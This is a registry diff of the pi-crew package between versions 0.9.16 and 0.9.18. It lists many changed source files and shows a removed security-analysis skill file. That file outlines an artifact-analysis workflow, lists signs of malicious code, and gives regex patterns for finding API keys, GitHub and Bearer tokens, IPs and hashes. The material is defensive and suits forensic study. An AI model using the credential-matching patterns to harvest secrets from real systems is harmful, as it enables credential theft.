pi-crew 0.9.16 → 0.9.18
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +130 -0
- package/README.md +19 -0
- package/dist/build-meta.json +21784 -0
- package/dist/index.mjs +83169 -0
- package/dist/index.mjs.map +7 -0
- package/docs/A +358 -0
- package/docs/M-A +357 -0
- package/docs/REVIEW-FINDINGS-2026-06 +357 -0
- package/docs/Y +357 -0
- package/docs/a +357 -0
- package/docs/aA +358 -0
- package/docs/archive/README.md +91 -0
- package/docs/migration/atomic-write-v2-migration.md +297 -0
- package/docs/patterns/command-agent-skill.md +1 -1
- package/docs/perf/performance-review-2026-07.md +287 -0
- package/docs/skills/REFERENCE.md +0 -17
- package/docs//303/242mmaAAA/303/242 +357 -0
- package/index.bundle.ts +25 -0
- package/index.ts +95 -4
- package/package.json +15 -4
- package/skills/iterative-audit/SKILL.md +0 -1
- package/skills/widget-rendering/SKILL.md +17 -0
- package/src/adapters/claude-adapter.ts +1 -3
- package/src/adapters/export-util.ts +16 -16
- package/src/adapters/index.ts +5 -5
- package/src/agents/agent-config.ts +20 -14
- package/src/agents/agent-serializer.ts +1 -1
- package/src/agents/discover-agents.ts +83 -39
- package/src/benchmark/benchmark-runner.ts +51 -51
- package/src/benchmark/feedback-loop.ts +1 -1
- package/src/config/config.ts +303 -591
- package/src/config/defaults.ts +28 -2
- package/src/config/drift-detector.ts +11 -14
- package/src/config/markers.ts +201 -203
- package/src/config/resilient-parser.ts +14 -6
- package/src/config/role-tools.ts +3 -3
- package/src/config/suggestions.ts +5 -12
- package/src/config/types.ts +9 -25
- package/src/errors.ts +151 -157
- package/src/extension/action-suggestions.ts +54 -9
- package/src/extension/async-notifier.ts +43 -13
- package/src/extension/autonomous-policy.ts +77 -37
- package/src/extension/command-completions.ts +9 -8
- package/src/extension/context-status-injection.ts +14 -12
- package/src/extension/crew-autocomplete.ts +8 -16
- package/src/extension/crew-cleanup.ts +2 -1
- package/src/extension/crew-shortcuts.ts +9 -6
- package/src/extension/cross-extension-rpc.ts +136 -42
- package/src/extension/help.ts +1 -1
- package/src/extension/import-index.ts +10 -5
- package/src/extension/knowledge-injection.ts +88 -15
- package/src/extension/management.ts +89 -349
- package/src/extension/message-renderers.ts +3 -4
- package/src/extension/notification-router.ts +22 -5
- package/src/extension/notification-sink.ts +6 -3
- package/src/extension/pi-api.ts +17 -8
- package/src/extension/plan-orchestrate.ts +8 -27
- package/src/extension/project-init.ts +21 -6
- package/src/extension/register.ts +329 -975
- package/src/extension/registration/artifact-cleanup.ts +9 -4
- package/src/extension/registration/command-utils.ts +5 -1
- package/src/extension/registration/commands.ts +806 -314
- package/src/extension/registration/compaction-guard.ts +15 -15
- package/src/extension/registration/lifecycle.ts +259 -0
- package/src/extension/registration/observability.ts +293 -0
- package/src/extension/registration/subagent-helpers.ts +29 -7
- package/src/extension/registration/subagent-tools.ts +253 -44
- package/src/extension/registration/team-tool.ts +19 -84
- package/src/extension/registration/ui.ts +168 -0
- package/src/extension/registration/viewers.ts +64 -24
- package/src/extension/result-watcher.ts +18 -7
- package/src/extension/run-bundle-schema.ts +21 -6
- package/src/extension/run-export.ts +15 -6
- package/src/extension/run-import.ts +64 -29
- package/src/extension/run-index.ts +28 -9
- package/src/extension/run-maintenance.ts +32 -12
- package/src/extension/session-summary.ts +1 -1
- package/src/extension/team-manager-command.ts +64 -7
- package/src/extension/team-onboard.ts +149 -150
- package/src/extension/team-recommendation.ts +121 -21
- package/src/extension/team-tool/anchor.ts +31 -64
- package/src/extension/team-tool/api.ts +929 -141
- package/src/extension/team-tool/auto-summarize.ts +14 -26
- package/src/extension/team-tool/cache-control.ts +1 -5
- package/src/extension/team-tool/cancel.ts +138 -38
- package/src/extension/team-tool/chain-dispatch.ts +5 -13
- package/src/extension/team-tool/chain-executor.ts +29 -51
- package/src/extension/team-tool/config-patch.ts +1 -1
- package/src/extension/team-tool/context.ts +40 -20
- package/src/extension/team-tool/destructive-gate.ts +10 -5
- package/src/extension/team-tool/doctor.ts +170 -51
- package/src/extension/team-tool/explain.ts +228 -214
- package/src/extension/team-tool/failure-patterns.ts +3 -9
- package/src/extension/team-tool/goal-wrap.ts +71 -29
- package/src/extension/team-tool/goal.ts +185 -35
- package/src/extension/team-tool/handle-schedule.ts +34 -15
- package/src/extension/team-tool/handle-settings.ts +94 -56
- package/src/extension/team-tool/health-monitor.ts +27 -108
- package/src/extension/team-tool/inspect.ts +42 -9
- package/src/extension/team-tool/intent-policy.ts +4 -1
- package/src/extension/team-tool/lifecycle-actions.ts +244 -48
- package/src/extension/team-tool/orchestrate.ts +7 -18
- package/src/extension/team-tool/parallel-dispatch.ts +51 -29
- package/src/extension/team-tool/plan.ts +29 -5
- package/src/extension/team-tool/respond.ts +49 -16
- package/src/extension/team-tool/run-not-found.ts +3 -8
- package/src/extension/team-tool/run.ts +80 -317
- package/src/extension/team-tool/status.ts +135 -43
- package/src/extension/team-tool/workflow-manage.ts +92 -25
- package/src/extension/team-tool-types.ts +8 -1
- package/src/extension/team-tool.ts +142 -551
- package/src/extension/validate-resources.ts +39 -8
- package/src/hooks/registry.ts +66 -17
- package/src/hooks/types.ts +1 -1
- package/src/i18n.ts +25 -11
- package/src/observability/correlation.ts +17 -3
- package/src/observability/event-bus.ts +51 -56
- package/src/observability/event-to-metric.ts +117 -15
- package/src/observability/exporters/otlp-exporter.ts +56 -17
- package/src/observability/exporters/prometheus-exporter.ts +1 -1
- package/src/observability/metric-registry.ts +16 -4
- package/src/observability/metric-retention.ts +8 -2
- package/src/observability/metric-sink.ts +11 -3
- package/src/observability/metrics-primitives.ts +42 -9
- package/src/plugins/plugin-define.ts +2 -2
- package/src/plugins/plugin-registry.ts +25 -25
- package/src/plugins/plugins/index.ts +1 -1
- package/src/plugins/plugins/nextjs.ts +16 -16
- package/src/plugins/plugins/vite.ts +7 -11
- package/src/plugins/plugins/vitest.ts +6 -11
- package/src/runtime/adaptive-plan.ts +225 -40
- package/src/runtime/agent-control.ts +58 -15
- package/src/runtime/agent-memory.ts +15 -9
- package/src/runtime/agent-observability.ts +10 -2
- package/src/runtime/anchor-manager.ts +27 -25
- package/src/runtime/async-marker.ts +7 -1
- package/src/runtime/async-runner.ts +39 -24
- package/src/runtime/auto-summarize.ts +7 -13
- package/src/runtime/background-runner.ts +189 -251
- package/src/runtime/batch-barrier.ts +18 -16
- package/src/runtime/cancellation-token.ts +16 -6
- package/src/runtime/cancellation.ts +46 -8
- package/src/runtime/capability-inventory.ts +6 -4
- package/src/runtime/chain-parser.ts +44 -11
- package/src/runtime/chain-runner.ts +63 -69
- package/src/runtime/checkpoint.ts +12 -56
- package/src/runtime/child-pi.ts +344 -79
- package/src/runtime/coalesce-tasks.ts +268 -0
- package/src/runtime/code-summary.ts +71 -26
- package/src/runtime/compact-stages/index.ts +15 -5
- package/src/runtime/compact-stages/tail-capture-stage.ts +7 -2
- package/src/runtime/compact-stages/truncation-stage.ts +4 -1
- package/src/runtime/compaction-summary.ts +17 -10
- package/src/runtime/completion-guard.ts +33 -16
- package/src/runtime/crash-classification.ts +28 -7
- package/src/runtime/crash-recovery.ts +177 -37
- package/src/runtime/crew-agent-records.ts +145 -47
- package/src/runtime/crew-hooks.ts +9 -24
- package/src/runtime/cross-extension-rpc.ts +25 -23
- package/src/runtime/custom-tools/irc-tool.ts +43 -15
- package/src/runtime/custom-tools/submit-result-tool.ts +16 -5
- package/src/runtime/delivery-coordinator.ts +34 -7
- package/src/runtime/delta-conflict.ts +9 -21
- package/src/runtime/deterministic-ast.ts +1 -1
- package/src/runtime/diagnostic-export.ts +53 -20
- package/src/runtime/direct-run.ts +12 -2
- package/src/runtime/dwf-state-store.ts +1 -1
- package/src/runtime/dynamic-workflow-context.ts +187 -59
- package/src/runtime/dynamic-workflow-runner.ts +42 -20
- package/src/runtime/effectiveness.ts +16 -8
- package/src/runtime/errors/crew-errors.ts +7 -11
- package/src/runtime/event-stream-bridge.ts +9 -3
- package/src/runtime/foreground-control.ts +54 -14
- package/src/runtime/foreground-watchdog.ts +9 -6
- package/src/runtime/goal-achievement.ts +27 -10
- package/src/runtime/goal-evaluator.ts +54 -19
- package/src/runtime/goal-loop-runner.ts +280 -99
- package/src/runtime/goal-state-store.ts +27 -17
- package/src/runtime/green-contract.ts +11 -2
- package/src/runtime/group-join.ts +64 -31
- package/src/runtime/handoff-manager.ts +37 -42
- package/src/runtime/heartbeat-gradient.ts +10 -2
- package/src/runtime/heartbeat-watcher.ts +32 -6
- package/src/runtime/hidden-handoff.ts +13 -31
- package/src/runtime/important-line-classifier.ts +12 -2
- package/src/runtime/iteration-hooks.ts +25 -15
- package/src/runtime/live-agent-control.ts +55 -7
- package/src/runtime/live-agent-manager.ts +130 -27
- package/src/runtime/live-control-realtime.ts +23 -3
- package/src/runtime/live-irc.ts +4 -1
- package/src/runtime/live-session-health.ts +12 -4
- package/src/runtime/live-session-runtime.ts +379 -117
- package/src/runtime/manifest-cache.ts +28 -12
- package/src/runtime/mcp-proxy.ts +10 -18
- package/src/runtime/metric-parser.ts +1 -5
- package/src/runtime/model-fallback.ts +55 -18
- package/src/runtime/model-resolver.ts +2 -6
- package/src/runtime/model-scope.ts +19 -3
- package/src/runtime/notebook-helpers.ts +60 -62
- package/src/runtime/orphan-worker-registry.ts +37 -26
- package/src/runtime/output-validator.ts +18 -3
- package/src/runtime/overflow-recovery.ts +5 -4
- package/src/runtime/parallel-research.ts +29 -5
- package/src/runtime/parallel-utils.ts +9 -11
- package/src/runtime/path-overlap.ts +150 -0
- package/src/runtime/peer-dep.ts +12 -17
- package/src/runtime/per-write-validator.ts +1 -3
- package/src/runtime/phase-tracker.ts +342 -330
- package/src/runtime/pi-args.ts +26 -8
- package/src/runtime/pi-json-output.ts +1 -1
- package/src/runtime/pi-spawn.ts +30 -19
- package/src/runtime/pipeline-runner.ts +56 -55
- package/src/runtime/plan-templates.ts +5 -6
- package/src/runtime/policy-engine.ts +43 -7
- package/src/runtime/post-checks.ts +12 -4
- package/src/runtime/post-exit-stdio-guard.ts +2 -2
- package/src/runtime/process-lifecycle.ts +20 -10
- package/src/runtime/process-status.ts +16 -5
- package/src/runtime/progress-event-coalescer.ts +2 -1
- package/src/runtime/progress-tracker.ts +103 -103
- package/src/runtime/prose-compressor.ts +9 -11
- package/src/runtime/recovery-recipes.ts +118 -24
- package/src/runtime/replace.ts +25 -10
- package/src/runtime/resilient-edit.ts +10 -25
- package/src/runtime/result-extractor.ts +2 -6
- package/src/runtime/retry-executor.ts +20 -4
- package/src/runtime/retry-runner.ts +27 -51
- package/src/runtime/role-permission.ts +6 -1
- package/src/runtime/run-coalesced-task-group.ts +256 -0
- package/src/runtime/run-drift.ts +14 -15
- package/src/runtime/run-tracker.ts +6 -28
- package/src/runtime/runtime-policy.ts +1 -6
- package/src/runtime/runtime-resolver.ts +80 -15
- package/src/runtime/scheduler.ts +47 -18
- package/src/runtime/semaphore.ts +5 -7
- package/src/runtime/sensitive-paths.ts +2 -1
- package/src/runtime/session-usage.ts +1 -1
- package/src/runtime/settings-store.ts +16 -12
- package/src/runtime/sidechain-output.ts +6 -2
- package/src/runtime/single-agent-compose.ts +1 -4
- package/src/runtime/skill-effectiveness.ts +29 -97
- package/src/runtime/skill-instructions.ts +40 -83
- package/src/runtime/stale-reconciler.ts +73 -197
- package/src/runtime/stream-preview.ts +1 -1
- package/src/runtime/streaming-output.ts +1 -1
- package/src/runtime/subagent-manager.ts +44 -169
- package/src/runtime/subprocess-tool-registry.ts +4 -1
- package/src/runtime/supervisor-contact.ts +10 -5
- package/src/runtime/task-display.ts +19 -5
- package/src/runtime/task-graph-scheduler.ts +95 -21
- package/src/runtime/task-graph.ts +5 -11
- package/src/runtime/task-health.ts +54 -47
- package/src/runtime/task-id.ts +12 -19
- package/src/runtime/task-output-context.ts +265 -81
- package/src/runtime/task-packet.ts +12 -20
- package/src/runtime/task-quality.ts +6 -14
- package/src/runtime/task-runner/context-retrieval.ts +4 -13
- package/src/runtime/task-runner/live-executor.ts +114 -36
- package/src/runtime/task-runner/output-splitter.ts +152 -0
- package/src/runtime/task-runner/progress.ts +50 -12
- package/src/runtime/task-runner/prompt-builder.ts +31 -7
- package/src/runtime/task-runner/prompt-pipeline.ts +31 -7
- package/src/runtime/task-runner/result-utils.ts +3 -1
- package/src/runtime/task-runner/retrieval-orchestrator.ts +310 -0
- package/src/runtime/task-runner/run-projection.ts +27 -8
- package/src/runtime/task-runner/state-helpers.ts +50 -14
- package/src/runtime/task-runner/tail-read.ts +2 -6
- package/src/runtime/task-runner.ts +180 -326
- package/src/runtime/team-runner-artifacts.ts +13 -0
- package/src/runtime/team-runner.ts +456 -974
- package/src/runtime/tool-output-pruner.ts +6 -9
- package/src/runtime/tool-progress.ts +11 -21
- package/src/runtime/verification-gates.ts +33 -24
- package/src/runtime/verification-integrity.ts +2 -7
- package/src/runtime/verification-worktree.ts +62 -12
- package/src/runtime/worker-heartbeat.ts +5 -1
- package/src/runtime/worker-startup.ts +29 -5
- package/src/runtime/workflow-state.ts +17 -9
- package/src/runtime/workspace-lock.ts +30 -35
- package/src/runtime/workspace-tree.ts +20 -32
- package/src/runtime/yield-handler.ts +43 -9
- package/src/runtime/zombie-scanner.ts +5 -4
- package/src/schema/config-schema.ts +266 -172
- package/src/schema/team-tool-schema.ts +29 -74
- package/src/schema/validation-types.ts +25 -17
- package/src/skills/discover-skills.ts +35 -10
- package/src/skills/skill-templates.ts +109 -27
- package/src/skills/validate.ts +26 -8
- package/src/state/active-run-registry.ts +87 -28
- package/src/state/artifact-store.ts +9 -5
- package/src/state/atomic-write-v2.ts +85 -63
- package/src/state/atomic-write.ts +106 -27
- package/src/state/blob-store.ts +47 -20
- package/src/state/contracts.ts +20 -5
- package/src/state/crew-init.ts +5 -22
- package/src/state/decision-ledger.ts +19 -73
- package/src/state/event-log-rotation.ts +41 -15
- package/src/state/event-log.ts +168 -53
- package/src/state/event-reconstructor.ts +11 -1
- package/src/state/gitignore-manager.ts +2 -8
- package/src/state/health-store.ts +57 -57
- package/src/state/hook-instinct-bridge.ts +1 -1
- package/src/state/hook-integrations.ts +1 -1
- package/src/state/instinct-store.ts +17 -5
- package/src/state/jsonl-writer.ts +1 -1
- package/src/state/locks.ts +23 -9
- package/src/state/mailbox.ts +151 -28
- package/src/state/observation-store.ts +20 -14
- package/src/state/run-cache.ts +142 -135
- package/src/state/run-graph.ts +6 -15
- package/src/state/run-metrics.ts +5 -18
- package/src/state/schedule.ts +15 -9
- package/src/state/state-store.ts +137 -47
- package/src/state/task-claims.ts +12 -2
- package/src/state/tiered-eval.ts +52 -43
- package/src/state/types-eval.ts +2 -2
- package/src/state/types.ts +24 -20
- package/src/state/usage.ts +20 -4
- package/src/state/worker-atomic-writer.ts +6 -3
- package/src/subagents/index.ts +2 -2
- package/src/teams/discover-teams.ts +21 -6
- package/src/tools/safe-bash-extension.ts +5 -6
- package/src/tools/safe-bash.ts +10 -11
- package/src/types/new-api-types.ts +6 -10
- package/src/ui/agent-management-overlay.ts +52 -40
- package/src/ui/card-colors.ts +13 -4
- package/src/ui/crew-footer.ts +8 -7
- package/src/ui/crew-select-list.ts +1 -1
- package/src/ui/dashboard-panes/agents-pane.ts +41 -25
- package/src/ui/dashboard-panes/cancellation-pane.ts +1 -1
- package/src/ui/dashboard-panes/capability-pane.ts +32 -15
- package/src/ui/dashboard-panes/health-pane.ts +2 -1
- package/src/ui/dashboard-panes/metrics-pane.ts +4 -1
- package/src/ui/dashboard-panes/progress-pane.ts +12 -9
- package/src/ui/heartbeat-aggregator.ts +15 -4
- package/src/ui/keybinding-map.ts +40 -7
- package/src/ui/live-conversation-overlay.ts +36 -20
- package/src/ui/live-duration.ts +1 -4
- package/src/ui/live-run-sidebar.ts +88 -25
- package/src/ui/loaders.ts +2 -8
- package/src/ui/mascot.ts +20 -36
- package/src/ui/overlays/agent-picker-overlay.ts +11 -3
- package/src/ui/overlays/confirm-overlay.ts +4 -2
- package/src/ui/overlays/help-overlay.ts +25 -14
- package/src/ui/overlays/mailbox-compose-overlay.ts +48 -11
- package/src/ui/overlays/mailbox-compose-preview.ts +20 -5
- package/src/ui/overlays/mailbox-detail-overlay.ts +27 -6
- package/src/ui/pi-ui-compat.ts +7 -7
- package/src/ui/powerbar-publisher.ts +120 -42
- package/src/ui/render-diff.ts +10 -3
- package/src/ui/render-scheduler.ts +12 -4
- package/src/ui/run-action-dispatcher.ts +81 -18
- package/src/ui/run-dashboard.ts +172 -76
- package/src/ui/run-event-bus.ts +59 -37
- package/src/ui/run-snapshot-cache.ts +276 -86
- package/src/ui/settings-overlay.ts +361 -74
- package/src/ui/status-colors.ts +12 -1
- package/src/ui/syntax-highlight.ts +1 -1
- package/src/ui/terminal-status.ts +1 -3
- package/src/ui/theme-adapter.ts +16 -14
- package/src/ui/theme-discovery.ts +13 -2
- package/src/ui/tool-progress-formatter.ts +7 -7
- package/src/ui/tool-render.ts +128 -56
- package/src/ui/tool-renderers/brief-mode.ts +45 -27
- package/src/ui/tool-renderers/index.ts +109 -43
- package/src/ui/transcript-cache.ts +32 -6
- package/src/ui/transcript-entries.ts +25 -23
- package/src/ui/transcript-viewer.ts +78 -29
- package/src/ui/widget/index.ts +99 -40
- package/src/ui/widget/widget-formatters.ts +13 -6
- package/src/ui/widget/widget-model.ts +19 -8
- package/src/ui/widget/widget-renderer.ts +23 -13
- package/src/ui/widget/widget-types.ts +1 -1
- package/src/utils/bm25-search.ts +199 -199
- package/src/utils/conflict-detect.ts +22 -21
- package/src/utils/env-filter.ts +14 -7
- package/src/utils/file-coalescer.ts +5 -1
- package/src/utils/fingerprint.ts +3 -6
- package/src/utils/frontmatter.ts +3 -1
- package/src/utils/fs-watch.ts +2 -6
- package/src/utils/gh-protocol.ts +119 -44
- package/src/utils/git.ts +13 -15
- package/src/utils/guards.ts +2 -5
- package/src/utils/ids.ts +9 -2
- package/src/utils/incremental-reader.ts +14 -3
- package/src/utils/internal-error.ts +2 -1
- package/src/utils/names.ts +12 -3
- package/src/utils/paths.ts +49 -5
- package/src/utils/project-detector.ts +2 -2
- package/src/utils/redaction.ts +29 -19
- package/src/utils/resolve-shell.ts +9 -7
- package/src/utils/run-watcher-registry.ts +19 -31
- package/src/utils/safe-paths.ts +46 -29
- package/src/utils/scan-cache.ts +9 -2
- package/src/utils/session-utils.ts +2 -4
- package/src/utils/sleep.ts +12 -5
- package/src/utils/sse-parser.ts +5 -17
- package/src/utils/visual.ts +52 -32
- package/src/workflows/discover-workflows.ts +41 -109
- package/src/workflows/intermediate-store.ts +5 -21
- package/src/workflows/preflight-validator.ts +6 -33
- package/src/workflows/topology-analyzer.ts +5 -21
- package/src/workflows/workflow-config.ts +7 -6
- package/src/worktree/branch-freshness.ts +66 -8
- package/src/worktree/cleanup.ts +130 -20
- package/src/worktree/worktree-manager.ts +212 -69
- package/skills/artifact-analysis-loop/SKILL.md +0 -303
- package/skills/detection-pipeline-design/SKILL.md +0 -286
- package/skills/hunting-investigation-loop/SKILL.md +0 -402
- package/skills/incident-playbook-construction/SKILL.md +0 -384
- package/skills/security-review/SKILL.md +0 -561
- package/skills/threat-hypothesis-framework/SKILL.md +0 -176
- package/skills/ui-render-performance/SKILL.md +0 -58
- /package/docs/{followup-review-round3-2026-05-12.md → archive/followup-review-round3-2026-05-12.md} +0 -0
- /package/docs/{followup-review-round4-2026-05-13.md → archive/followup-review-round4-2026-05-13.md} +0 -0
- /package/docs/{pi-crew-bugs.md → archive/pi-crew-bugs.md} +0 -0
- /package/docs/{pi-crew-test-final.md → archive/pi-crew-test-final.md} +0 -0
- /package/docs/{pi-crew-test-results.md → archive/pi-crew-test-results.md} +0 -0
- /package/docs/{pi-crew-test-round2.md → archive/pi-crew-test-round2.md} +0 -0
- /package/docs/{pi-crew-test-round4.md → archive/pi-crew-test-round4.md} +0 -0
- /package/docs/{pi-crew-test-round5.md → archive/pi-crew-test-round5.md} +0 -0
- /package/docs/{pi-crew-test-round6.md → archive/pi-crew-test-round6.md} +0 -0
- /package/docs/{pi-crew-v0.5.10-audit-fix-plan.md → archive/pi-crew-v0.5.10-audit-fix-plan.md} +0 -0
- /package/docs/{pi-crew-v0.5.11-audit-fix-plan.md → archive/pi-crew-v0.5.11-audit-fix-plan.md} +0 -0
- /package/docs/{pi-crew-v0.5.12-audit-fix-plan.md → archive/pi-crew-v0.5.12-audit-fix-plan.md} +0 -0
- /package/docs/{pi-crew-v0.5.13-audit-fix-plan.md → archive/pi-crew-v0.5.13-audit-fix-plan.md} +0 -0
- /package/docs/{pi-crew-v0.5.14-audit-fix-plan.md → archive/pi-crew-v0.5.14-audit-fix-plan.md} +0 -0
- /package/docs/{pi-crew-v0.5.16-audit-fix-plan.md → archive/pi-crew-v0.5.16-audit-fix-plan.md} +0 -0
- /package/docs/{pi-crew-v0.5.17-audit-fix-plan.md → archive/pi-crew-v0.5.17-audit-fix-plan.md} +0 -0
- /package/docs/{pi-crew-v0.5.5-audit-fix-plan.md → archive/pi-crew-v0.5.5-audit-fix-plan.md} +0 -0
- /package/docs/{pi-crew-v0.5.9-audit-fix-plan.md → archive/pi-crew-v0.5.9-audit-fix-plan.md} +0 -0
- /package/docs/{pi-mono-opportunities.md → archive/pi-mono-opportunities.md} +0 -0
- /package/docs/{pi-mono-review.md → archive/pi-mono-review.md} +0 -0
- /package/docs/{pi-subagent4-comparison.md → archive/pi-subagent4-comparison.md} +0 -0
- /package/docs/{pi-subagents3-deep-analysis.md → archive/pi-subagents3-deep-analysis.md} +0 -0
|
@@ -1,303 +0,0 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: artifact-analysis-loop
|
|
3
|
-
description: "Systematic artifact examination for code, files, and binaries."
|
|
4
|
-
origin: distilled:anthropic-cybersecurity-skills
|
|
5
|
-
triggers:
|
|
6
|
-
- "analyze this artifact"
|
|
7
|
-
- "examine file"
|
|
8
|
-
- "dissect sample"
|
|
9
|
-
- "malware analysis"
|
|
10
|
-
- "forensic investigation"
|
|
11
|
-
---
|
|
12
|
-
# artifact-analysis-loop
|
|
13
|
-
|
|
14
|
-
Use this skill when conducting systematic artifact analysis (files, code, binaries, configs).
|
|
15
|
-
|
|
16
|
-
## Source
|
|
17
|
-
|
|
18
|
-
Distilled from 35+ `analyzing-*` skills (Anthropic Cybersecurity Skills) and generalized for software artifacts.
|
|
19
|
-
|
|
20
|
-
## When to Use
|
|
21
|
-
|
|
22
|
-
- Analyzing suspicious files or code
|
|
23
|
-
- Malware/sample examination
|
|
24
|
-
- Post-incident artifact forensics
|
|
25
|
-
- Vulnerability analysis in specific files
|
|
26
|
-
- Reverse engineering code patterns
|
|
27
|
-
|
|
28
|
-
## Artifact Analysis Loop
|
|
29
|
-
|
|
30
|
-
```
|
|
31
|
-
┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐
|
|
32
|
-
│ Collect │ → │ Identify │ → │ Analyze │ → │ Extract │ → │ Map │
|
|
33
|
-
│ Artifact │ │ Type │ │ Structure│ │ Findings │ │ to Frame-│
|
|
34
|
-
│ │ │ │ │ │ │ │ │ work │
|
|
35
|
-
└──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘
|
|
36
|
-
↓
|
|
37
|
-
┌──────────┐
|
|
38
|
-
│ Report │
|
|
39
|
-
│Findings │
|
|
40
|
-
└──────────┘
|
|
41
|
-
```
|
|
42
|
-
|
|
43
|
-
## Analysis Workflow
|
|
44
|
-
|
|
45
|
-
```markdown
|
|
46
|
-
## Artifact Analysis Loop
|
|
47
|
-
|
|
48
|
-
1. **Collect** → Artifact: [file, code snippet, binary, config, log]
|
|
49
|
-
2. **Identify** → Type: [source code, binary, config, log, data]
|
|
50
|
-
3. **Analyze** → Structure: [static, dynamic, pattern match]
|
|
51
|
-
4. **Extract** → Findings: [patterns, indicators, relationships]
|
|
52
|
-
5. **Map** → To framework: [OWASP, CVE, MITRE, CWE]
|
|
53
|
-
6. **Correlate** → With context: [git history, PR, incident]
|
|
54
|
-
7. **Report** → Structured findings with confidence
|
|
55
|
-
```
|
|
56
|
-
|
|
57
|
-
## Artifact Types & Analysis Methods
|
|
58
|
-
|
|
59
|
-
### 1. Source Code Analysis
|
|
60
|
-
|
|
61
|
-
```yaml
|
|
62
|
-
artifact_type: source_code
|
|
63
|
-
analysis_methods:
|
|
64
|
-
static:
|
|
65
|
-
- pattern_matching: [regex, AST]
|
|
66
|
-
- control_flow: [function_graph, call_graph]
|
|
67
|
-
- data_flow: [variable_taints, function_args]
|
|
68
|
-
- import_analysis: [dependencies, external_calls]
|
|
69
|
-
dynamic:
|
|
70
|
-
- execution: [sandbox, test_env]
|
|
71
|
-
- behavior: [network, filesystem, process]
|
|
72
|
-
signs_of_malice:
|
|
73
|
-
- eval_exec_abuse: [eval(), exec(), Function(), new Function()]
|
|
74
|
-
- obfuscation: [encoded_strings, dead_code, indirect_calls]
|
|
75
|
-
- credential_access: [env_vars, config_files, hardcoded_secrets]
|
|
76
|
-
- network_suspicious: [hardcoded_ips, dns_tunneling, c2_patterns]
|
|
77
|
-
```
|
|
78
|
-
|
|
79
|
-
### 2. Binary Analysis
|
|
80
|
-
|
|
81
|
-
```yaml
|
|
82
|
-
artifact_type: binary
|
|
83
|
-
analysis_methods:
|
|
84
|
-
static:
|
|
85
|
-
- file_metadata: [size, entropy, sections]
|
|
86
|
-
- string_extraction: [strings, IOCs]
|
|
87
|
-
- header_analysis: [pe_format, elf_format]
|
|
88
|
-
- symbol_analysis: [exported_funcs, imports]
|
|
89
|
-
dynamic:
|
|
90
|
-
- sandbox_execution: [cuckoo, any.run]
|
|
91
|
-
- memory_analysis: [volatility, rekall]
|
|
92
|
-
- network_capture: [wireshark, mitmproxy]
|
|
93
|
-
signs_of_malice:
|
|
94
|
-
- persistence: [registry, startup, service]
|
|
95
|
-
- injection: [dll_injection, process_hollowing]
|
|
96
|
-
- network: [suspicious_connections, dns_tunnel]
|
|
97
|
-
```
|
|
98
|
-
|
|
99
|
-
### 3. Configuration Analysis
|
|
100
|
-
|
|
101
|
-
```yaml
|
|
102
|
-
artifact_type: config
|
|
103
|
-
analysis_methods:
|
|
104
|
-
- syntax_validation: [json, yaml, toml]
|
|
105
|
-
- permission_analysis: [file_perms, ownership]
|
|
106
|
-
- secret_detection: [api_keys, tokens, passwords]
|
|
107
|
-
- network_config: [endpoints, ports, protocols]
|
|
108
|
-
- security_options: [tls, auth, encryption]
|
|
109
|
-
signs_of_malice:
|
|
110
|
-
- misconfiguration: [overly_permissive, default_creds]
|
|
111
|
-
- secrets: [hardcoded_keys, plaintext_passwords]
|
|
112
|
-
- network: [unencrypted, suspicious_endpoints]
|
|
113
|
-
```
|
|
114
|
-
|
|
115
|
-
### 4. Log Analysis
|
|
116
|
-
|
|
117
|
-
```yaml
|
|
118
|
-
artifact_type: log
|
|
119
|
-
analysis_methods:
|
|
120
|
-
- timeline_reconstruction: [timestamp_analysis, event_order]
|
|
121
|
-
- pattern_detection: [anomaly, repeated_failure]
|
|
122
|
-
- correlation: [cross_source, session_analysis]
|
|
123
|
-
- ioc_extraction: [ips, domains, hashes, users]
|
|
124
|
-
- attack_indicators: [kill_chain_phases, techniques]
|
|
125
|
-
signs_of_malice:
|
|
126
|
-
- auth_failures: [brute_force, credential_stuffing]
|
|
127
|
-
- suspicious_actions: [privilege_escalation, lateral_movement]
|
|
128
|
-
- data_access: [bulk_download, unusual_access]
|
|
129
|
-
```
|
|
130
|
-
|
|
131
|
-
## IOC Extraction Patterns
|
|
132
|
-
|
|
133
|
-
```yaml
|
|
134
|
-
ioc_types:
|
|
135
|
-
credentials:
|
|
136
|
-
patterns:
|
|
137
|
-
- '(api[_-]?key|secret|token|password)\s*[=:]\s*["\']?[A-Za-z0-9+/]{20,}'
|
|
138
|
-
- '(ghp|github)_[A-Za-z0-9]{36,}'
|
|
139
|
-
- 'Bearer\s+[A-Za-z0-9+/=._-]+'
|
|
140
|
-
extraction: regex
|
|
141
|
-
network:
|
|
142
|
-
patterns:
|
|
143
|
-
- '\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'
|
|
144
|
-
- '\b(?:[a-f0-9]{1,4}:){7}[a-f0-9]{1,4}\b' # IPv6
|
|
145
|
-
- '(?:https?|tcp|udp)://[^\s]+'
|
|
146
|
-
validation: whois, reverse_dns
|
|
147
|
-
file_hashes:
|
|
148
|
-
patterns:
|
|
149
|
-
- '\b[A-Fa-f0-9]{32}\b' # MD5
|
|
150
|
-
- '\b[A-Fa-f0-9]{40}\b' # SHA1
|
|
151
|
-
- '\b[A-Fa-f0-9]{64}\b' # SHA256
|
|
152
|
-
validation: virus_total, malware_db
|
|
153
|
-
```
|
|
154
|
-
|
|
155
|
-
## Framework Mapping
|
|
156
|
-
|
|
157
|
-
```yaml
|
|
158
|
-
frameworks:
|
|
159
|
-
MITRE_ATTACK:
|
|
160
|
-
technique_extraction:
|
|
161
|
-
- tactic: [initial_access, execution, persistence]
|
|
162
|
-
- technique: [T1190, T1059, T1547]
|
|
163
|
-
- indicators: [specific patterns that map]
|
|
164
|
-
OWASP:
|
|
165
|
-
category_extraction:
|
|
166
|
-
- category: [A1, A2, A3, ...]
|
|
167
|
-
- weakness: [injection, auth_failure, sensitive_data]
|
|
168
|
-
- indicators: [code patterns that map]
|
|
169
|
-
CWE:
|
|
170
|
-
weakness_extraction:
|
|
171
|
-
- cwe_id: [CWE-78, CWE-79, CWE-89]
|
|
172
|
-
- description: [command_injection, xss, sql_injection]
|
|
173
|
-
- indicators: [code patterns that map]
|
|
174
|
-
```
|
|
175
|
-
|
|
